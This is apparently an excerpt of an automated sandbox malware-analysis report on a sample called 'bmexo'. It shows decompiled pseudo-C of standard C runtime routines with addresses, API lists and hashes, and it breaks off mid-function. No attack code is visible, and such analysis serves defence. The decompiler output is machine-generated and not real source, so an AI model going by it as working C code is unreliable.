                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 8e4da8b66900af92ec3077b53a1111735cc3924cc4ae25843c4cc3fdbb422a1f
                                          • Instruction ID: 8bf6c868a2ec8fe44b6e38d0ba6408ece2b02c76f23bc02e1f27048379ec848c
                                          • Opcode Fuzzy Hash: 8e4da8b66900af92ec3077b53a1111735cc3924cc4ae25843c4cc3fdbb422a1f
                                          • Instruction Fuzzy Hash: 44B0923504420CABCB102B91EC0EB483F28EB14752F100420FA0D440608B725422AA92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2439B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F2439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                          0x00f243a8

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00F243A1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 524f178d1d168c7776b865635a2ffeca1aeb4b5de449437ab329802d5afe3588
                                          • Instruction ID: 583cd3ee69341acc83d8dfcbf9764f89d97bc1ec3815e905c9222b5f099dbcf9
                                          • Opcode Fuzzy Hash: 524f178d1d168c7776b865635a2ffeca1aeb4b5de449437ab329802d5afe3588
                                          • Instruction Fuzzy Hash: EEA0113000020CAB8A002B82EC0A8883F2CEB002A0B000020F80C000208B32A822AA82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00160A2C Relevance: .2, Instructions: 207COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b69271ece767db0df3bd79ea24b885f0a386d22ec4868d9885c5a4a7ad9c1c4f
                                          • Instruction ID: ac190ed5d66fb63fd26bcc63697603389345e1dac989897d789c076448ddbc5a
                                          • Opcode Fuzzy Hash: b69271ece767db0df3bd79ea24b885f0a386d22ec4868d9885c5a4a7ad9c1c4f
                                          • Instruction Fuzzy Hash: BFA1041485D2DDADCB06CBF981507FCBFB05E2A102F4845C6E4E5A6283C53A938EDB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F238A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00F238A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xf32260);
				E00F22400(__ebx, __edi, __esi);
				E00F2442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00F24869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xf34848 = _t82;
					 *0xf350e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xf34848; // 0x77f230
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xf34848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xf36100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -15943740
											E00F240A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E00F23B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00F22445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xf350e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E00F24869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xf34848[_t149] = _t138;
							 *0xf350e4 =  *0xf350e4 + _t141;
							__eflags =  *0xf350e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0xf34848[_t149];
								if(_t138 >= 0x800 + 0xf34848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xf350e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xf34848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00F240A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00F22600(_t155, 0xf33400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                          0x00f238a8
                                          0x00f238aa
                                          0x00f238af
                                          0x00f238b6
                                          0x00f238be
                                          0x00f238c1
                                          0x00f238c5
                                          0x00f238c6
                                          0x00f238c7
                                          0x00f238ce
                                          0x00f238d0
                                          0x00f238d5
                                          0x00f238f2
                                          0x00f238f7
                                          0x00f238fd
                                          0x00f23902
                                          0x00f23904
                                          0x00000000
                                          0x00000000
                                          0x00f23906
                                          0x00f2390c
                                          0x00f2390f
                                          0x00f23912
                                          0x00f2391b
                                          0x00f2391e
                                          0x00f23924
                                          0x00f23927
                                          0x00f2392a
                                          0x00f2392d
                                          0x00f23930
                                          0x00f23930
                                          0x00f2393b
                                          0x00f23941
                                          0x00f23946
                                          0x00f23a7b
                                          0x00f23a7d
                                          0x00f23a7e
                                          0x00f23a7e
                                          0x00f23a7e
                                          0x00f23a80
                                          0x00f23a80
                                          0x00f23a83
                                          0x00f23a86
                                          0x00000000
                                          0x00000000
                                          0x00f23a91
                                          0x00f23a97
                                          0x00f23a9a
                                          0x00f23a9d
                                          0x00f23ab1
                                          0x00f23ab1
                                          0x00f23ab5
                                          0x00f23ab7
                                          0x00f23abe
                                          0x00f23ac3
                                          0x00f23ac5
                                          0x00f23ac5
                                          0x00f23ab9
                                          0x00f23abb
                                          0x00f23abb
                                          0x00f23ac9
                                          0x00f23acf
                                          0x00f23ad2
                                          0x00f23ad5
                                          0x00f23b23
                                          0x00f23b29
                                          0x00f23b2c
                                          0x00f23b2e
                                          0x00f23b33
                                          0x00f23b35
                                          0x00f23b3a
                                          0x00f23b3a
                                          0x00000000
                                          0x00f23ad7
                                          0x00f23ad7
                                          0x00f23ad9
                                          0x00000000
                                          0x00000000
                                          0x00f23adc
                                          0x00f23ae2
                                          0x00f23ae4
                                          0x00000000
                                          0x00000000
                                          0x00f23ae9
                                          0x00f23aeb
                                          0x00f23af0
                                          0x00f23af3
                                          0x00f23afd
                                          0x00f23b00
                                          0x00f23b0b
                                          0x00f23b12
                                          0x00f23b16
                                          0x00f23b1b
                                          0x00f23b1e
                                          0x00f23b3d
                                          0x00f23b3d
                                          0x00000000
                                          0x00f23b3d
                                          0x00f23b06
                                          0x00f23b06
                                          0x00f23b08
                                          0x00f23b08
                                          0x00000000
                                          0x00f23b08
                                          0x00f23af9
                                          0x00000000
                                          0x00f23af9
                                          0x00f23ad5
                                          0x00f23a9f
                                          0x00f23aa1
                                          0x00000000
                                          0x00000000
                                          0x00f23aa9
                                          0x00000000
                                          0x00f23aa9
                                          0x00f23b43
                                          0x00f23b46
                                          0x00f23b4b
                                          0x00f23b4b
                                          0x00f23b4d
                                          0x00f23b52
                                          0x00f23b52
                                          0x00f2394c
                                          0x00f2394f
                                          0x00f23951
                                          0x00000000
                                          0x00000000
                                          0x00f23957
                                          0x00f23959
                                          0x00f2395c
                                          0x00f2395f
                                          0x00f23964
                                          0x00f2396c
                                          0x00f2396e
                                          0x00f23970
                                          0x00f23972
                                          0x00f23972
                                          0x00f23977
                                          0x00f23977
                                          0x00f23978
                                          0x00f2397b
                                          0x00f2397b
                                          0x00f23981
                                          0x00000000
                                          0x00000000
                                          0x00f2398d
                                          0x00f2398f
                                          0x00f23992
                                          0x00f23994
                                          0x00f23a2e
                                          0x00f23a35
                                          0x00f23a35
                                          0x00f23a3b
                                          0x00f23a47
                                          0x00f23a49
                                          0x00000000
                                          0x00000000
                                          0x00f23a4b
                                          0x00f23a51
                                          0x00f23a54
                                          0x00f23a57
                                          0x00f23a5b
                                          0x00f23a61
                                          0x00f23a64
                                          0x00f23a67
                                          0x00f23a6a
                                          0x00f23a6a
                                          0x00f23a6f
                                          0x00f23a70
                                          0x00f23a73
                                          0x00000000
                                          0x00f23a73
                                          0x00f2399a
                                          0x00f239a0
                                          0x00000000
                                          0x00f239a0
                                          0x00f239a3
                                          0x00f239a5
                                          0x00f239aa
                                          0x00f239ab
                                          0x00f239ae
                                          0x00f239b1
                                          0x00f239b1
                                          0x00f239b3
                                          0x00000000
                                          0x00000000
                                          0x00f239b9
                                          0x00f239bb
                                          0x00f239be
                                          0x00f23a1b
                                          0x00f23a1b
                                          0x00f23a1c
                                          0x00f23a22
                                          0x00f23a23
                                          0x00f23a26
                                          0x00f23a29
                                          0x00000000
                                          0x00f23a29
                                          0x00f239c0
                                          0x00f239c2
                                          0x00000000
                                          0x00000000
                                          0x00f239c4
                                          0x00f239c6
                                          0x00f239c8
                                          0x00000000
                                          0x00000000
                                          0x00f239ca
                                          0x00f239cc
                                          0x00f239dc
                                          0x00f239e9
                                          0x00f239f0
                                          0x00f239f5
                                          0x00f239fc
                                          0x00f23a06
                                          0x00f23a0a
                                          0x00f23a0f
                                          0x00f23a12
                                          0x00f23a12
                                          0x00f23a12
                                          0x00f23a15
                                          0x00f23a18
                                          0x00f23a18
                                          0x00000000
                                          0x00f23a18
                                          0x00f239cf
                                          0x00f239d5
                                          0x00f239d8
                                          0x00f239da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f239da
                                          0x00000000
                                          0x00f239b1
                                          0x00f238ea
                                          0x00000000

                                          APIs
                                          • __lock.LIBCMT ref: 00F238B6
                                            • Part of subcall function 00F2442F: __mtinitlocknum.LIBCMT ref: 00F24441
                                            • Part of subcall function 00F2442F: EnterCriticalSection.KERNEL32(00000000,?,00F237AB,0000000D), ref: 00F2445A
                                          • __calloc_crt.LIBCMT ref: 00F238C7
                                            • Part of subcall function 00F24869: __calloc_impl.LIBCMT ref: 00F24878
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F238E2
                                          • GetStartupInfoW.KERNEL32(?,00F32260,00000064,00F21654,00F32190,00000014), ref: 00F2393B
                                          • __calloc_crt.LIBCMT ref: 00F23986
                                          • GetFileType.KERNEL32 ref: 00F239CF
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2772871689-0
                                          • Opcode ID: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction ID: dd4e4a338abbaec1797c91964a1c9e8e708664458bfbc02cccb88bade7aa4ab6
                                          • Opcode Fuzzy Hash: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction Fuzzy Hash: 4881E5B1D052658FCB14CF68E8416A9BBF0AF45320B24426ED4A6AB3D1C73CE943EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F23815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00F23815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00F21890(_t3);
				if(E00F24560() != 0) {
					_t6 = E00F24001(E00F235A6);
					 *0xf3350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00F24869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00F2388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00F2405D( *0xf3350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00F23762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00F2388B();
					return 0;
				}
			}








                                          0x00f23815
                                          0x00f23821
                                          0x00f23830
                                          0x00f23835
                                          0x00f2383b
                                          0x00f2383e
                                          0x00000000
                                          0x00f23840
                                          0x00f2384d
                                          0x00f23851
                                          0x00f23853
                                          0x00f23882
                                          0x00f23882
                                          0x00f23887
                                          0x00f2388a
                                          0x00f23855
                                          0x00f23863
                                          0x00f23865
                                          0x00000000
                                          0x00f23867
                                          0x00f23867
                                          0x00f23869
                                          0x00f2386a
                                          0x00f23871
                                          0x00f23877
                                          0x00f2387b
                                          0x00f2387f
                                          0x00f23881
                                          0x00f23881
                                          0x00f23865
                                          0x00f23853
                                          0x00f23823
                                          0x00f23823
                                          0x00f23823
                                          0x00f2382a
                                          0x00f2382a

                                          APIs
                                          • __init_pointers.LIBCMT ref: 00F23815
                                            • Part of subcall function 00F21890: RtlEncodePointer.NTDLL(00000000,?,00F2381A,00F2163A,00F32190,00000014), ref: 00F21893
                                            • Part of subcall function 00F21890: __initp_misc_winsig.LIBCMT ref: 00F218AE
                                            • Part of subcall function 00F21890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F24117
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F2412B
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F2413E
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F24151
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F24164
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F24177
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F2418A
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F2419D
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F241B0
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F241C3
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F241D6
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F241E9
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F241FC
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F2420F
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F24222
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F24235
                                          • __mtinitlocks.LIBCMT ref: 00F2381A
                                          • __mtterm.LIBCMT ref: 00F23823
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F2447A
                                            • Part of subcall function 00F2388B: _free.LIBCMT ref: 00F24481
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00F33558,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F244A3
                                          • __calloc_crt.LIBCMT ref: 00F23848
                                          • __initptd.LIBCMT ref: 00F2386A
                                          • GetCurrentThreadId.KERNEL32(00F2163A,00F32190,00000014), ref: 00F23871
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction ID: 53679f9e9f826de9714607a961869154b42b86f33cd884e755be5cba76d35680
                                          • Opcode Fuzzy Hash: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction Fuzzy Hash: 07F090B391923659E679B7787C036CA3A84CF01730B24862EF464DC0D2FF5DDA817A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F27452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00F27452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xf34834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xf34830 == _t7) {
									_t9 = E00F21CC3();
									 *_t9 = E00F21CD6(GetLastError());
									goto L17;
								} else {
									if(E00F21741(_t7, _t31) == 0) {
										_t12 = E00F21CC3();
										 *_t12 = E00F21CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00F21741(_t6, _t31);
						 *((intOrPtr*)(E00F21CC3())) = 0xc;
						goto L12;
					} else {
						E00F24831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00F2114B(__ebx, __edx, __edi, _a8);
				}
			}









                                          0x00f27459
                                          0x00f27467
                                          0x00f2746c
                                          0x00f2747b
                                          0x00f274ae
                                          0x00f27480
                                          0x00f27482
                                          0x00f27482
                                          0x00f2748f
                                          0x00f27495
                                          0x00f27499
                                          0x00f274f9
                                          0x00f274f9
                                          0x00f2749b
                                          0x00f274a1
                                          0x00f274e3
                                          0x00f274f7
                                          0x00000000
                                          0x00f274a3
                                          0x00f274ac
                                          0x00f274cb
                                          0x00f274df
                                          0x00f274c5
                                          0x00f274c5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f274ac
                                          0x00f274a1
                                          0x00000000
                                          0x00f274c7
                                          0x00f274b4
                                          0x00f274bf
                                          0x00000000
                                          0x00f2746e
                                          0x00f27471
                                          0x00f27477
                                          0x00f27477
                                          0x00f274c8
                                          0x00f274ca
                                          0x00f2745b
                                          0x00f27465
                                          0x00f27465

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2745E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                          • _free.LIBCMT ref: 00F27471
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          • Opcode ID: daeaece3dd57e1633c5abac113a44338899c63b2ac03801185fd963ca12dd68e
                                          • Instruction ID: fb447e93684eef3c71140e95eba00b7b1477385d4cae60da360431e1652530e0
                                          • Opcode Fuzzy Hash: daeaece3dd57e1633c5abac113a44338899c63b2ac03801185fd963ca12dd68e
                                          • Instruction Fuzzy Hash: EE110A32D4A735DBCB31BF70BC45B5A3FD8BF10370B204529F9489A250DA788841F694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F291C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F291C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00F24BFC( &_v20, _a16);
					_t35 = _v20;
